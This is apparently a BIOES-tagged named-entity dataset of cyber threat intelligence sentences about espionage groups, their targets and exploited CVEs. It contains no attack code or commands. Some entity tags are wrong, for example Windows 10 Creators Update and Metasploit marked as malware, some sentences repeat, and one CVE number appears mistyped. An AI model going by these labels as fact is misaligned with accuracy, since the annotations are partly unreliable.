B-LOC +States E-LOC +and O +compromised O +servers O +in O +the O +Netherlands S-LOC +to O +wage O +attacks O +against O +global O +oil S-IDTY +, O +gas S-IDTY +, O +and O +petrochemical B-IDTY +companies E-IDTY +, O +as O +well O +as O +individuals O +and O +executives S-IDTY +in O +Kazakhstan S-LOC +, O +Taiwan S-LOC +, O +Greece S-LOC +, O +and O +the O +United B-LOC +States E-LOC +to O +acquire O +proprietary O +and O +highly O +confidential O +information O +. 
O + +Attackers S-APT +using O +several O +locations O +in O +China S-LOC +have O +leveraged O +C&C S-TOOL +servers O +on O +purchased O +hosted O +services O +in O +the O +United B-LOC +States E-LOC +and O +compromised O +servers O +in O +the O +Netherlands S-LOC +to O +wage O +attacks O +against O +global O +oil S-IDTY +, O +gas S-IDTY +, O +and O +petrochemical B-IDTY +companies E-IDTY +, O +as O +well O +as O +individuals O +and O +executives S-IDTY +in O +Kazakhstan S-LOC +, O +Taiwan S-LOC +, O +Greece S-LOC +, O +and O +the O +United B-LOC +States E-LOC +to O +acquire O +proprietary O +and O +highly O +confidential O +information O +. O + +Additionally O +, O +HELIX B-APT +KITTEN I-APT +actors E-APT +have O +shown O +an O +affinity O +for O +creating O +thoroughly O +researched O +and O +structured O +spear-phishing S-ACT +messages O +relevant O +to O +the O +interests O +of O +targeted O +personnel S-IDTY +. O + +The O +attackers S-APT +sent O +multiple O +emails S-TOOL +containing O +macro-enabled O +XLS B-FILE +files E-FILE +to O +employees B-IDTY +working I-IDTY +in I-IDTY +the I-IDTY +banking I-IDTY +sector E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O + +In O +late O +2015 S-TIME +, O +Symantec S-SECTEAM +identified O +suspicious O +activity O +involving O +a O +hacking O +tool O +used O +in O +a O +malicious O +manner O +against O +one O +of O +our O +customers S-IDTY +. O + +The O +SWC S-ACT +of O +a O +Uyghur O +cultural O +website O +suggests O +intent O +to O +target O +the O +Uyghur B-IDTY +ethnic I-IDTY +group E-IDTY +, O +a O +Muslim B-IDTY +minority I-IDTY +group E-IDTY +primarily O +found O +in O +the O +Xinjiang S-LOC +region O +of O +China O +. O + +It's O +possible O +TG-3390 S-APT +used O +a O +waterhole S-ACT +to O +infect O +data B-IDTY +center I-IDTY +employees E-IDTY +. 
O + +The O +initial O +attack O +vector O +used O +in O +the O +attack O +against O +the O +data O +center O +is O +unclear O +, O +but O +researchers O +believe O +LuckyMouse S-APT +possibly O +had O +conducted O +watering B-ACT +hole E-ACT +or O +phishing B-ACT +attacks E-ACT +to O +compromise O +accounts O +belonging O +to O +employees S-IDTY +at O +the O +national O +data O +center O +. O + +The O +group O +, O +believed O +to O +be O +based O +in O +China S-LOC +, O +has O +also O +targeted O +defense B-IDTY +contractors E-IDTY +, O +colleges S-IDTY +and O +universities S-IDTY +, O +law B-IDTY +firms E-IDTY +, O +and O +political B-IDTY +organizations E-IDTY +— O +including O +organizations O +related O +to O +Chinese O +minority B-IDTY +ethnic I-IDTY +groups E-IDTY +. O + +In O +all O +cases O +, O +based O +on O +the O +nature O +of O +the O +computers O +infected O +by O +Thrip O +, O +it O +appeared O +that O +the O +telecoms B-IDTY +companies E-IDTY +themselves O +and O +not O +their O +customers S-IDTY +were O +the O +targets O +of O +these O +attacks O +. O + +Turla S-APT +is O +a O +notorious O +group O +that O +has O +been O +targeting O +government B-IDTY +officials E-IDTY +. O + +Turla S-APT +is O +a O +notorious O +group O +that O +has O +been O +targeting O +diplomats S-IDTY +. O + +The O +attackers O +behind O +Epic B-MAL +Turla E-MAL +have O +infected O +several O +hundred O +computers O +in O +more O +than O +45 O +countries O +, O +including O +embassies S-IDTY +. O + +From O +February S-TIME +to O +September B-TIME +2016 E-TIME +, O +WhiteBear B-ACT +activity E-ACT +was O +narrowly O +focused O +on O +embassies S-IDTY +and O +consular O +operations O +around O +the O +world O +. O + +All O +of O +these O +early O +WhiteBear S-MAL +targets O +were O +related O +to O +embassies S-IDTY +and O +diplomatic/foreign O +affair O +organizations O +. 
O + +Thus O +, O +Turla S-APT +operators O +had O +access O +to O +some O +highly O +sensitive O +information O +( O +such O +as O +emails S-TOOL +sent O +by O +the O +German B-IDTY +Foreign I-IDTY +Office I-IDTY +staff E-IDTY +) O +for O +almost O +a O +year O +. O + +We O +suspect O +the O +Kazuar B-MAL +tool E-MAL +may O +be O +linked O +to O +the O +Turla S-APT +threat O +actor O +group O +( O +also O +known O +as O +Uroburos S-APT +and O +Snake S-APT +) O +, O +who O +have O +been O +reported O +to O +have O +compromised O +embassies S-IDTY +, O +defense B-IDTY +contractors E-IDTY +, O +educational B-IDTY +institutions E-IDTY +, O +and O +research B-IDTY +organizations E-IDTY +across O +the O +globe O +. O + +Deepen S-SECTEAM +told O +Threatpost O +the O +group O +has O +been O +operating O +since O +at O +least O +since O +2008 S-TIME +and O +has O +targeted O +China B-IDTY +and I-IDTY +US I-IDTY +relations I-IDTY +experts E-IDTY +, O +Defense B-SECTEAM +Department E-SECTEAM +entities O +, O +and O +geospatial B-IDTY +groups E-IDTY +within O +the O +federal B-IDTY +government E-IDTY +. O + +Government B-IDTY +officials E-IDTY +said O +they O +knew O +the O +initial O +attack O +occurred O +in O +2011 S-TIME +, O +but O +are O +unaware O +of O +who O +specifically O +is O +behind O +the O +attacks O +. O + +Bahamut O +was O +first O +noticed O +when O +it O +targeted O +a O +Middle B-IDTY +Eastern I-IDTY +human I-IDTY +rights I-IDTY +activist E-IDTY +in O +the O +first O +week O +of O +January B-TIME +2017 E-TIME +. O + +Later O +that O +month O +, O +the O +same O +tactics O +and O +patterns O +were O +seen O +in O +attempts O +against O +an O +Iranian B-IDTY +women I-IDTY +'s I-IDTY +activist E-IDTY +– O +an O +individual S-IDTY +commonly O +targeted O +by O +Iranian B-LOC +actors E-LOC +, O +such O +as O +Charming O +Kitten O +and O +the O +Sima B-ACT +campaign E-ACT +documented O +in O +our O +2016 S-TIME +Black O +Hat O +talk O +. 
O + +Several O +times O +, O +APT5 S-APT +has O +targeted O +organizations S-IDTY +and O +personnel S-IDTY +based O +in O +Southeast B-LOC +Asia E-LOC +. O + +Given O +our O +increased O +confidence O +that O +Bahamut O +was O +responsible O +for O +targeting O +of O +Qatari S-LOC +labor B-IDTY +rights I-IDTY +advocates E-IDTY +and O +its O +focus O +on O +the O +foreign B-IDTY +policy I-IDTY +institutions E-IDTY +other O +Gulf O +states O +, O +Bahamut O +'s O +interests O +are O +seemingly O +too O +expansive O +to O +be O +limited O +one O +sponsor O +or O +customer O +. O + +Barium S-APT +specializes O +in O +targeting O +high O +value O +organizations O +holding O +sensitive O +data O +, O +by O +gathering O +extensive O +information O +about O +their O +employees S-IDTY +through O +publicly O +available O +information O +and O +social B-IDTY +media E-IDTY +, O +using O +that O +information O +to O +fashion O +phishing B-ACT +attacks E-ACT +intended O +to O +trickthose O +employees S-IDTY +into O +compromising O +their O +computers O +and O +networks O +. O + +Barium S-APT +has O +targeted O +Microsoft B-IDTY +customers E-IDTY +both O +in O +Virginia O +, O +the O +United O +States O +, O +and O +around O +the O +world O +. O + +BLACKGEAR S-ACT +is O +an O +espionage B-ACT +campaign E-ACT +which O +has O +targeted O +users S-IDTY +in O +Taiwan S-LOC +for O +many O +years O +. O + +Our O +research O +indicates O +that O +it O +has O +started O +targeting O +Japanese B-IDTY +users E-IDTY +. O + +Our O +experts O +have O +found O +that O +cybercriminals O +are O +actively O +focusing O +on O +SMBs S-MAL +, O +and O +giving O +particular O +attention O +to O +accountants S-IDTY +. 
O + +Clever B-APT +Kitten E-APT +actors O +have O +a O +strong O +affinity O +for O +PHP O +server-side O +attacks O +to O +make O +access O +; O +this O +is O +relatively O +unique O +amongst O +targeted O +attackers O +who O +often O +favor O +targeting O +a O +specific O +individual S-IDTY +at O +a O +specific O +organization O +using O +social B-IDTY +engineering E-IDTY +. O + +Some O +of O +the O +exploit S-VULNAME +server O +paths O +contain O +modules O +that O +appear O +to O +have O +been O +designed O +to O +infect O +Linux S-OS +computers O +, O +but O +we O +have O +not O +yet O +located O +the O +Linux S-OS +backdoor O +. O + +Confucius O +targeted O +a O +particular O +set O +of O +individuals O +in O +South O +Asian O +countries O +, O +such O +as O +military B-IDTY +personnel E-IDTY +and O +businessmen S-IDTY +, O +among O +others O +. O + +According O +to O +statistics O +, O +Corkow S-MAL +primarily O +targets O +users S-IDTY +in O +Russia O +and O +the O +CIS O +, O +but O +it O +is O +worth O +noting O +that O +in O +2014 S-TIME +the O +amount O +of O +attacks O +targeting O +the O +USA O +increased O +by O +5 O +times O +, O +in O +comparison O +with O +2011 S-TIME +. O + +The O +threat O +is O +likely O +targeting O +employees S-IDTY +of O +various O +Palestinian S-LOC +government B-IDTY +agencies E-IDTY +, O +security B-IDTY +services E-IDTY +, O +Palestinian O +students S-IDTY +, O +and O +those O +affiliated O +with O +the O +Fatah B-IDTY +political I-IDTY +party E-IDTY +. O + +For O +example O +, O +the O +actors O +behind O +FrozenCell S-MAL +used O +a O +spoofed O +app O +called O +Tawjihi B-MAL +2016 E-MAL +, O +which O +Jordanian S-LOC +or O +Palestinian S-LOC +students S-IDTY +would O +ordinarily O +use O +during O +their O +general O +secondary O +examination O +. 
O + +The O +titles O +and O +contents O +of O +these O +files O +suggest O +that O +the O +actor O +targeted O +individuals O +affiliated O +with O +these O +government B-IDTY +agencies E-IDTY +and O +the O +Fatah B-IDTY +political I-IDTY +party E-IDTY +. O + +Political B-IDTY +entities E-IDTY +in O +Central O +Asia O +have O +been O +targeted O +throughout O +2018 S-TIME +by O +different O +actors O +, O +including O +IndigoZebra S-APT +, O +Sofacy S-APT +( O +with O +Zebrocy S-MAL +malware S-MAL +) O +and O +most O +recently O +by O +DustSquad O +( O +with O +Octopus S-MAL +malware S-MAL +) O +. O + +Targets O +included O +a O +wide O +array O +of O +high-profile O +entities O +, O +including O +intelligence B-IDTY +services E-IDTY +, O +military S-IDTY +, O +utility B-IDTY +providers E-IDTY +( O +telecommunications S-IDTY +and O +power S-IDTY +) O +, O +embassies S-IDTY +, O +and O +government B-IDTY +institutions E-IDTY +. O + +The O +computers O +of O +diplomats S-IDTY +, O +military B-IDTY +attachés E-IDTY +, O +private B-IDTY +assistants E-IDTY +, O +secretaries S-IDTY +to O +Prime B-IDTY +Ministers E-IDTY +, O +journalists S-IDTY +and O +others O +are O +under O +the O +concealed O +control O +of O +unknown O +assailant O +(s O +) O +. O + +The O +banking O +malware O +GozNym S-MAL +has O +legs O +; O +only O +a O +few O +weeks O +after O +the O +hybrid O +Trojan S-MAL +was O +discovered O +, O +it O +has O +reportedly O +spread O +into O +Europe O +and O +begun O +plaguing O +banking B-IDTY +customers E-IDTY +in O +Poland O +with O +redirection B-ACT +attacks E-ACT +. O + +We O +noted O +in O +our O +original O +blog O +the O +large O +amount O +of O +targeting O +of O +Iranian S-LOC +citizens S-IDTY +in O +this O +campaign O +, O +we O +observed O +almost O +one-third O +of O +all O +victims O +to O +be O +Iranian O +. 
O + +Since O +early O +2013 S-TIME +, O +we O +have O +observed O +activity O +from O +a O +unique O +threat O +actor O +group O +, O +which O +we O +began O +to O +investigate O +based O +on O +increased O +activities S-ACT +against O +human O +right O +activists S-IDTY +in O +the O +beginning O +of O +2015 S-TIME +. O + +Over O +the O +course O +of O +three O +years O +of O +observation O +of O +campaigns S-ACT +targeting O +civil B-IDTY +society E-IDTY +and O +human B-IDTY +rights I-IDTY +organizations E-IDTY +, O +from O +records O +of O +well O +over O +two O +hundred O +spearphishing S-ACT +and O +other O +intrusion O +attempts O +against O +individuals O +inside O +of O +Iran S-LOC +and O +in O +the O +diaspora S-IDTY +, O +a O +narrative O +of O +persistent O +intrusion O +efforts O +emerges O +. O + +Over O +the O +months O +following O +the O +elections O +, O +the O +accounts O +of O +Iranians S-IDTY +that O +had O +been O +compromised O +by O +the O +actors O +were O +then O +used O +for O +spreading O +the O +malware O +. O + +The O +Infy S-MAL +malware S-MAL +was O +seen O +targeting O +Iranians S-IDTY +again O +in O +June B-TIME +2015 E-TIME +, O +when O +it O +was O +shared O +with O +researchers O +after O +being O +sent O +to O +a O +broadcast B-IDTY +journalist E-IDTY +at O +BBC B-IDTY +Persian E-IDTY +with O +a O +generic O +introduction O +and O +a O +PowerPoint S-TOOL +presentation O +attached O +titled O +" O +Nostalogy O +" O +( O +sic O +) O +. O + +One O +narrowly-targeted O +spearphishing S-ACT +from O +Infy O +was O +sent O +from O +the O +compromised O +account O +of O +a O +political B-IDTY +activist E-IDTY +promoting O +participation O +inside O +of O +Iran S-LOC +, O +claiming O +to O +be O +a O +set O +of O +images O +of O +a O +British-Iranian S-IDTY +dual O +national O +that O +has O +been O +held O +in O +Evin O +Prison O +for O +five O +years O +on O +espionage O +charges O +. 
O + +As O +in O +the O +past O +, O +these O +messages O +have O +been O +sent O +accounts O +believed O +to O +be O +fake O +and O +accounts O +compromised O +by O +Infy O +, O +including O +Kurdish B-IDTY +activists E-IDTY +that O +had O +previously O +been O +compromised O +by O +the O +Flying B-APT +Kitten I-APT +actor I-APT +group E-APT +. O + +The O +Windows B-MAL +10 I-MAL +Creators I-MAL +Update E-MAL +will O +bring O +several O +enhancements O +to O +Windows B-SECTEAM +Defender I-SECTEAM +ATP E-SECTEAM +that O +will O +provide O +SOC B-IDTY +personnel E-IDTY +with O +options O +for O +immediate O +mitigation O +of O +a O +detected O +threat O +. O + +LEAD O +and O +Barium S-APT +are O +not O +known O +for O +large-scale O +spear-phishing S-ACT +, O +so O +it O +is O +unlikely O +that O +SOC B-IDTY +personnel E-IDTY +would O +have O +to O +deal O +with O +multiple O +machines O +having O +been O +compromised O +by O +these O +groups O +at O +the O +same O +time O +. O + +While O +the O +machine O +is O +in O +isolation O +, O +SOC B-IDTY +personnel E-IDTY +can O +direct O +the O +infected O +machine O +to O +collect O +live O +investigation O +data O +, O +such O +as O +the O +DNS S-PROT +cache O +or O +security O +event O +logs O +, O +which O +they O +can O +use O +to O +verify O +alerts O +, O +assess O +the O +state O +of O +the O +intrusion O +, O +and O +support O +follow-up O +actions O +. O + +The O +samples O +provided O +were O +alleged O +to O +be O +targeting O +Tibetan S-LOC +and O +Chinese B-LOC +Pro-Democracy I-IDTY +Activists E-IDTY +. O + +They O +are O +often O +targeted O +simultaneously O +with O +other O +ethnic B-IDTY +minorities E-IDTY +and O +religious B-IDTY +groups E-IDTY +in O +China S-LOC +. 
O + +Examples O +as O +early O +as O +2008 S-TIME +document B-FILE +malware E-FILE +operations O +against O +Tibetan B-IDTY +non-governmental I-IDTY +organizations E-IDTY +( O +NGOs S-IDTY +) O +that O +also O +targeted O +Falun B-IDTY +Gong E-IDTY +and O +Uyghur B-IDTY +groups E-IDTY +. O + +Unit B-SECTEAM +42 E-SECTEAM +recently O +identified O +a O +targeted B-ACT +attack E-ACT +against O +an O +individual O +working O +for O +the O +Foreign B-IDTY +Ministry E-IDTY +of O +Uzbekistan B-LOC +in I-LOC +China E-LOC +. O + +NetTraveler S-MAL +has O +been O +used O +to O +target O +diplomats S-IDTY +, O +embassies S-IDTY +and O +government B-IDTY +institutions E-IDTY +for O +over O +a O +decade O +, O +and O +remains O +the O +tool O +of O +choice O +by O +the O +adversaries O +behind O +these O +cyber B-ACT +espionage I-ACT +campaigns E-ACT +. O + +The O +NetTraveler O +group O +has O +infected O +victims O +across O +multiple O +establishments O +in O +both O +the O +public O +and O +private O +sector O +including O +government B-IDTY +institutions E-IDTY +, O +embassies S-IDTY +, O +the O +oil B-IDTY +and I-IDTY +gas I-IDTY +industry E-IDTY +, O +research O +centers O +, O +military B-IDTY +contractors E-IDTY +and O +activists S-IDTY +. O + +The O +main O +point O +that O +sets O +Operation B-ACT +Groundbait E-ACT +apart O +from O +the O +other O +attacks O +is O +that O +it O +has O +mostly O +been O +targeting O +anti-government B-IDTY +separatists E-IDTY +in O +the O +self-declared O +Donetsk O +and O +Luhansk O +People O +'s O +Republics O +. O + +Although O +Silence O +'s O +phishing B-ACT +emails S-TOOL +were O +also O +sent O +to O +bank B-IDTY +employees E-IDTY +in O +Central B-LOC +and I-LOC +Western I-LOC +Europe E-LOC +, O +Africa S-LOC +, O +and O +Asia S-LOC +) O +. 
O + +They O +tried O +new O +techniques O +to O +steal O +from O +banking O +systems O +, O +including O +AWS O +CBR O +( O +the O +Russian S-LOC +Central B-IDTY +Bank I-IDTY +'s I-IDTY +Automated I-IDTY +Workstation I-IDTY +Client E-IDTY +) O +, O +ATMs S-IDTY +, O +and O +card O +processing O +. O + +However O +, O +some O +phishing B-ACT +emails S-TOOL +were O +sent O +to O +bank B-IDTY +employees E-IDTY +in O +more O +than O +25 O +countries O +of O +Central S-LOC +and O +Western S-LOC +Europe S-LOC +, O +Africa S-LOC +and O +Asia S-LOC +including O +: O +Kyrgyzstan S-LOC +, O +Armenia S-LOC +, O +Georgia S-LOC +, O +Serbia S-LOC +, O +Germany S-LOC +, O +Latvia S-LOC +, O +Czech B-LOC +Republic E-LOC +, O +Romania S-LOC +, O +Kenya S-LOC +, O +Israel S-LOC +, O +Cyprus S-LOC +, O +Greece S-LOC +, O +Turkey S-LOC +, O +Taiwan S-LOC +, O +Malaysia S-LOC +, O +Switzerland S-LOC +, O +Vietnam S-LOC +, O +Austria S-LOC +, O +Uzbekistan S-LOC +, O +Great B-LOC +Britain E-LOC +, O +Hong B-LOC +Kong E-LOC +, O +and O +others O +. O + +An O +interesting O +point O +in O +the O +Silence B-ACT +attack E-ACT +is O +that O +the O +cybercriminals O +had O +already O +compromised O +banking S-IDTY +infrastructure O +in O +order O +to O +send O +their O +spear-phishing S-ACT +emails S-TOOL +from O +the O +addresses O +of O +real O +bank B-IDTY +employees E-IDTY +and O +look O +as O +unsuspicious O +as O +possible O +to O +future O +victims O +. O + +A O +preliminary O +analysis O +caught O +the O +attention O +of O +our O +Threat O +Analysis O +and O +Intelligence O +team O +as O +it O +yielded O +interesting O +data O +that O +, O +among O +other O +things O +, O +shows O +that O +Silence O +was O +targeting O +employees S-IDTY +from O +financial B-IDTY +entities E-IDTY +, O +specifically O +in O +the O +Russian B-LOC +Federation E-LOC +and O +the O +Republic B-LOC +of I-LOC +Belarus E-LOC +. 
O + +While O +the O +Sima O +moniker O +could O +similarly O +originate O +from O +software O +labels O +, O +it O +is O +a O +common O +female O +Persian O +name O +and O +a O +Persian-language O +Word S-TOOL +for O +" O +visage O +" O +or O +" O +appearance O +" O +. O +Given O +its O +use O +in O +more O +advanced O +social B-IDTY +engineering I-IDTY +campaigns E-IDTY +against O +women B-IDTY +'s I-IDTY +rights I-IDTY +activists E-IDTY +, O +the O +label O +seem O +particularly O +apt O +. O + +Samples O +and O +resource O +names O +contained O +the O +family O +names O +of O +prominent O +Iranians S-IDTY +, O +and O +several O +of O +these O +individuals O +received O +the O +malware O +located O +in O +their O +respective O +folder O +. O + +For O +the O +sake O +of O +narrative O +we O +are O +going O +to O +focus O +exclusively O +to O +those O +samples O +we O +identified O +being O +used O +in O +attacks O +against O +Iranian S-LOC +civil B-IDTY +society E-IDTY +and O +diaspora S-IDTY +. O + +After O +reviewing O +all O +the O +malware O +functionalities O +, O +we O +are O +confident O +in O +saying O +that O +the O +attackers S-APT +look O +for O +victims B-IDTY +who I-IDTY +answer E-IDTY +well-defined O +characteristics O +and O +believe O +that O +further O +stages O +of O +the O +attack O +are O +delivered O +only O +to O +those O +who O +fit O +the O +specific O +victim O +profile O +. O + +It's O +coincident O +that O +both O +'darkhydrus' S-APT +APT O +group O +name O +and O +‘Williams’ S-APT +user O +name O +in O +PDB O +path O +found O +in O +this O +Twitter B-IDTY +user E-IDTY +. O + +The O +360 O +Intelligence O +Center O +observed O +four O +distinct O +campaigns O +against O +Pakistan S-LOC +since O +2017 O +(link) O +, O +recently O +targeting O +Pakistani B-IDTY +businessmen E-IDTY +working O +in O +China O +. 
O + +In O +the O +latest O +attack O +, O +Donot B-APT +group E-APT +is O +targeting O +Pakistani B-IDTY +businessman E-IDTY +working O +in O +China S-LOC + +A O +previous O +, O +removed O +, O +report O +from O +another O +vendor O +claimed O +non-specific O +information O +about O +the O +groups' S-APT +interest O +in O +Chinese B-IDTY +universities E-IDTY +, O +but O +that O +report O +has O +been O +removed O +– O +most O +likely O +detections O +were O +related O +to O +students’ O +and O +researchers’ O +scanning O +known O +collected O +samples O +and O +any O +incidents” O +remain O +unconfirmed O +and O +unknown O +. O + +The O +most O +popular O +targets O +of O +SneakyPastes S-APT +are O +embassies S-IDTY +, O +government B-IDTY +entities E-IDTY +, O +education S-IDTY +, O +media B-IDTY +outlets E-IDTY +, O +journalists O +, O +activists S-IDTY +, O +political O +parties O +or O +personnel S-IDTY +, O +healthcare S-IDTY +and O +banking S-IDTY +. O + +Through O +our O +continuous O +monitoring O +of O +threats O +during O +2018 S-TIME +, O +we O +observed O +a O +new O +wave O +of O +attacks O +by O +Gaza B-APT +Cybergang I-APT +Group1 E-APT +targeting O +embassies S-IDTY +and O +political B-IDTY +personnel E-IDTY +. O + +This O +could O +include O +diplomats S-IDTY +, O +experts O +in O +the O +LOCs O +of O +interest O +related O +to O +the O +Digital O +Economy O +Task O +Force O +, O +or O +possibly O +even O +journalists S-IDTY +. O + +This O +focus O +on O +training O +aligns O +with O +LYCEUM’s S-APT +targeting O +of O +executives S-IDTY +, O +HR B-IDTY +staff E-IDTY +, O +and O +IT B-IDTY +personnel E-IDTY +. O + +Despite O +the O +initial O +perception O +that O +the O +maldoc S-MAL +sample O +was O +intended O +for O +ICS S-IDTY +or O +OT B-IDTY +staff E-IDTY +, O +LYCEUM S-APT +has O +not O +demonstrated O +an O +interest O +in O +those O +environments O +. 
O + +The O +threat O +actor’s S-APT +emails S-TOOL +usually O +contain O +a O +picture O +or O +a O +link O +without O +a O +malicious B-FILE +payload E-FILE +and O +are O +sent O +out O +to O +a O +huge O +recipient O +database O +of O +up O +to O +85 O +, O +000 O +users S-IDTY +. O + +Group-IB S-SECTEAM +specialists O +determined O +that O +the O +email S-TOOL +addresses O +of O +IT O +bank S-IDTY +employees S-IDTY +were O +among O +the O +recipients O +of O +these O +emails S-TOOL +. O + +While O +OceanLotus’ S-APT +targets O +are O +global O +, O +their O +operations O +are O +mostly O +active O +within O +the O +APAC S-LOC +region O +which O +encompasses O +targeting O +private O +sectors O +across O +multiple O +industries O +, O +foreign B-IDTY +governments E-IDTY +, O +activists S-IDTY +, O +and O +dissidents S-IDTY +connected O +to O +Vietnam S-LOC +. O + +The O +attackers S-APT +sent O +multiple O +emails S-TOOL +containing O +macro-enabled O +XLS B-FILE +files E-FILE +to O +employees B-IDTY +working I-IDTY +in I-IDTY +the I-IDTY +banking I-IDTY +sector E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O + +Examples O +as O +early O +as O +2008 S-TIME +document B-FILE +malware E-FILE +operations O +against O +Tibetan B-IDTY +non-governmental I-IDTY +organizations E-IDTY +( O +NGOs S-IDTY +) O +that O +also O +targeted O +Falun B-IDTY +Gong E-IDTY +and O +Uyghur B-IDTY +groups E-IDTY +. O + +The O +document O +exploited O +CVE-2012-0158 S-VULID +and O +will O +decode O +and O +write O +an O +executable O +to O +disk O +upon O +infection O +. O + +iSiGHT B-SECTEAM +Partners E-SECTEAM +has O +tracked O +Sandworm B-APT +Team E-APT +for O +some O +time O +- O +and O +we O +publicly O +reported O +on O +some O +of O +their O +activities S-ACT +in O +October B-TIME +2014 E-TIME +, O +when O +we O +discovered O +their O +use O +of O +a O +zero-day S-VULNAME +exploit S-VULNAME +, O +CVE-2014-4114 S-VULID +. 
O + +In O +July B-TIME +of I-TIME +2015 E-TIME +, O +we O +identified O +a O +full O +e-mail S-TOOL +uploaded O +to O +an O +antivirus O +scanning O +service O +that O +carried O +a O +Scarlet B-TOOL +Mimic E-TOOL +exploit S-VULNAME +document O +. O + +The O +group O +uses O +legitimate O +administration O +tools O +to O +fly O +under O +the O +radar O +in O +their O +post-exploitation O +phase O +, O +which O +makes O +detection O +of O +malicious B-ACT +activity E-ACT +, O +as O +well O +as O +attribution O +more O +complicated O +. O + +Through O +the O +exploitation O +of O +the O +HTA O +handler O +vulnerability O +described O +in O +CVE-2017-1099 S-VULID +, O +the O +observed O +RTF S-TOOL +attachments O +download O +. O + +In O +early O +May S-TIME +, O +the O +phishing B-ACT +lures E-ACT +leveraged O +RTF S-TOOL +attachments O +that O +exploited O +the O +Microsoft S-IDTY +Windows S-OS +vulnerability O +described O +in O +CVE-2017-0199 S-VULID +. O + +As O +early O +as O +March B-TIME +4 E-TIME +, O +2017 S-TIME +, O +malicious B-FILE +documents E-FILE +exploiting O +CVE-2017-0199 S-VULID +were O +used O +to O +deliver O +the O +LATENTBOT S-MAL +malware S-MAL +. O + +FireEye S-SECTEAM +believes O +that O +two O +actors S-APT +– O +Turla S-APT +and O +an O +unknown O +financially S-IDTY +motivated O +actor O +– O +were O +using O +the O +first O +EPS O +zero-day S-VULNAME +CVE-2017-0261 S-VULID +, O +and O +APT28 S-APT +was O +using O +the O +second O +EPS O +zero-day S-VULNAME +CVE-2017-0262 S-VULID +along O +with O +a O +new O +Escalation O +of O +Privilege O +(EOP) O +zero-day S-VULNAME +CVE-2017-0263 S-VULID +. O + +The O +first O +, O +st07383.en17.docx S-FILE +, O +continues O +by O +utilizing O +32 O +or O +64 O +bit O +versions O +of O +CVE-2017-0001 S-VULID +to O +escalate O +privileges O +before O +executing O +a O +final O +JavaScript O +payload O +containing O +a O +malware O +implant O +known O +as O +SHIRIME S-FILE +. 
O + +This O +vulnerability O +was O +found O +in O +a O +document O +named O +Trump's_Attack_on_Syria_English.docx S-FILE +. O + +It O +is O +possible O +that O +CVE-2017-8759 S-VULID +was O +being O +used O +by O +additional O +actors S-APT +. O + +The O +addition O +of O +the O +EternalBlue S-VULNAME +exploit S-VULNAME +to O +Metasploit S-MAL +has O +made O +it O +easy O +for O +threat O +actors S-APT +to O +exploit S-VULNAME +these O +vulnerabilities O +. O + +The O +Magnitude B-MAL +EK E-MAL +landing O +page O +consisted O +of O +CVE-2016-0189 S-VULID +, O +which O +was O +first O +reported O +by O +FireEye S-SECTEAM +as O +being O +used O +in O +Neutrino B-MAL +Exploit I-MAL +Kit E-MAL +after O +it O +was O +patched O +. O + +The O +malware O +leverages O +an O +exploit S-VULNAME +, O +codenamed O +EternalBlue S-VULNAME +, O +that O +was O +released O +by O +the O +Shadow B-APT +Brokers E-APT +on O +April B-TIME +14 E-TIME +, O +2017 S-TIME +. O + +Some O +hackers O +even O +went O +onto O +use O +the O +Cisco S-SECTEAM +exploits S-VULNAME +in O +the O +wild O +. O + +DanderSpritz S-MAL +is O +the O +framework O +for O +controlling O +infected O +machines O +, O +different O +from O +FuZZbuNch S-MAL +as O +the O +latter O +provides O +a O +limited O +toolkit O +for O +the O +post-exploitation O +stage O +with O +specific O +functions O +such O +as O +DisableSecurity S-MAL +and O +EnableSecurity S-MAL +for O +DarkPulsar S-MAL +. O + +In O +their O +latest O +leak O +, O +they O +have O +released O +the O +UNITEDRAKE B-TOOL +NSA E-TOOL +exploit S-VULNAME +, O +which O +is O +a O +remote O +access O +and O +control O +tool O +that O +can O +remotely O +target O +Windows-based S-OS +systems O +to O +capture O +desired O +information O +and O +transfer O +it O +to O +a O +server O +. 
O + +On O +the O +other O +hand O +, O +ShadowBrokers O +group O +made O +headlines O +in O +2016 S-TIME +when O +it O +claimed O +to O +have O +robbed O +various O +exploitation O +tools O +used O +by O +the O +NSA S-IDTY +including O +the O +notorious O +EternalBlue S-VULNAME +that O +was O +a O +vital O +component O +in O +the O +WannaCry B-ACT +ransomware I-ACT +campaign E-ACT +causing O +damages O +to O +systems O +worldwide O +. O + +In O +all O +emails S-TOOL +sent O +to O +these O +government B-IDTY +officials E-IDTY +, O +the O +actor O +used O +the O +same O +attachment O +: O +a O +malicious B-FILE +Microsoft I-FILE +Word I-FILE +document E-FILE +that O +exploited O +the O +CVE-2012-0158 S-VULID +vulnerability O +to O +drop O +a O +malicious O +payload O +. O + +Despite O +being O +an O +older O +vulnerability O +, O +many O +threat O +actors O +continue O +to O +leverage O +CVE-2012-0158 S-VULID +to O +exploit S-VULNAME +Microsoft B-FILE +Word E-FILE +. O + +According O +to O +the O +security B-IDTY +firm E-IDTY +, O +this O +campaign O +targeted O +Indian O +military B-IDTY +officials E-IDTY +via O +spear-phishing S-ACT +emails S-TOOL +, O +distributing O +spyware O +to O +its O +victims O +via O +an O +Adobe B-TOOL +Reader E-TOOL +vulnerability S-VULNAME +. O + +In O +order O +to O +carry O +out O +this O +operation O +, O +it O +uses O +publicly B-MAL +available I-MAL +tools E-MAL +, O +including O +Mimikatz S-MAL +( O +Hacktool.Mimikatz S-MAL +) O +and O +an O +open-source O +tool O +that O +exploits O +a O +known O +Windows S-OS +privilege O +escalation O +vulnerability O +( O +CVE-2016-0051 S-VULID +) O +on O +unpatched O +computers O +. O + +Each O +of O +the O +spear B-ACT +phishing I-ACT +attacks E-ACT +contained O +links O +to O +.doc B-MAL +files E-MAL +, O +which O +were O +really O +RTF B-FILE +documents E-FILE +that O +attempt O +to O +exploit S-VULNAME +CVE-2017-8570 S-VULID +( O +Composite B-TOOL +Moniker E-TOOL +) O +. 
